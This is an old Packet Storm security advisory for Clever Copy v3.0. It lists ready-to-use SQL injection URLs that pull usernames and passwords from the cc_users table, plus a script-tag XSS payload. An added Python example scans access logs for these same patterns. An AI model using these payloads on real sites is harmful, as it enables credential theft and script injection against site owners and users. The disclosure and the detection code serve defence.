clevercopy-sqlxss.txt

2008-01-18T00:00:00
ID PACKETSTORM:62746
Type packetstorm
Reporter virangar security team
Modified 2008-01-18T00:00:00

Description

                                        
                                            `   
####################################################################  
# #  
# ...:::::Clever Copy v3.0 Multiple Remote Vulnerabilities::::....#  
# (sql injection/xss) #  
# #  
####################################################################  
  
Virangar Security Team  
  
www.virangar.org  
www.virangar.net  
  
--------  
Discovered by: virangar security team (hadihadi)  
  
---------------------------------  
special tnx to:MR.nosrati,MR.hesy,satan,Zahra  
& my lovely friend arash from emperor team  
& all virangar members & all hackerz  
  
greetz:to my best friend in the world hadi_aryaie2004  
& my lovely friend arash(imm02tal) from emperor team :x  
  
------------------------------------  
vulns are in postcomment.php & gallery.php ;)  
  
  
sql injections:  
http://localhost/cc/postcomment.php?ID='/**/union/**/select/**/1,2,3,4,5,6,concat(char(117,115,101,114,110,97,109,101,61),username),concat(0x70617373776f72643d,password),9,10,11,12,13,14,15,16,17/**/from/**/cc_users/**/where/**/theid=1/*  
http://localhost/cc/gallery.php?album='/**/union/**/select/**/null,password,null,null,username,null,null,null/**/from/**/cc_users/**/where/**/theid=1/*  
########################  
xss:  
http://localhost/cc/gallery.php?album=<script>alert('xss')</script>  
########################  
`
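
Added example (not part of the original advisory, and not Clever Copy code): one way to review web server access logs for requests that hit the two parameters named above with the UNION SELECT or script-tag patterns shown. The combined-log format, the sample lines, and the names classify, scan and SAMPLE_LOG are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Script -> query parameter, as named in the advisory.
WATCHED = {"postcomment.php": "ID", "gallery.php": "album"}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_COMMENT = re.compile(r"/\*.*?\*/|/\*.*$", re.S)  # closed, or left open at the end
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
SCRIPT_TAG = re.compile(r"<\s*script\b", re.I)


def classify(value):
    """Return the sorted findings for one decoded parameter value."""
    findings = set()
    # /**/ stands in for spaces in the requests above, so comments become spaces first.
    if UNION_SELECT.search(SQL_COMMENT.sub(" ", value)):
        findings.add("sqli")
    if SCRIPT_TAG.search(value):
        findings.add("xss")
    return sorted(findings)


def scan(lines):
    """Return (line_no, script, param, findings) for each suspicious request."""
    hits = []
    for no, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        script = url.path.rsplit("/", 1)[-1]
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name == WATCHED.get(script):
                # parse_qsl decodes once; decode again to catch double encoding.
                findings = classify(unquote_plus(value))
                if findings:
                    hits.append((no, script, name, findings))
    return hits


# Constructed access-log lines (combined-log style, documentation IP range).
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Jan/2008:10:00:01 +0000] "GET /cc/gallery.php?album=holiday HTTP/1.1" 200 5120',
    "203.0.113.9 - - [18/Jan/2008:10:02:11 +0000] \"GET /cc/postcomment.php?ID='/**/union/**/select/**/1,2/**/from/**/cc_users/* HTTP/1.1\" 200 812",
    '203.0.113.9 - - [18/Jan/2008:10:02:40 +0000] "GET /cc/gallery.php?album=%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1" 200 900',
    '203.0.113.7 - - [18/Jan/2008:10:05:00 +0000] "GET /cc/index.php?q=union+select HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Hits on these parameters in historical logs indicate requests worth correlating with the response size and with later logins to accounts stored in cc_users.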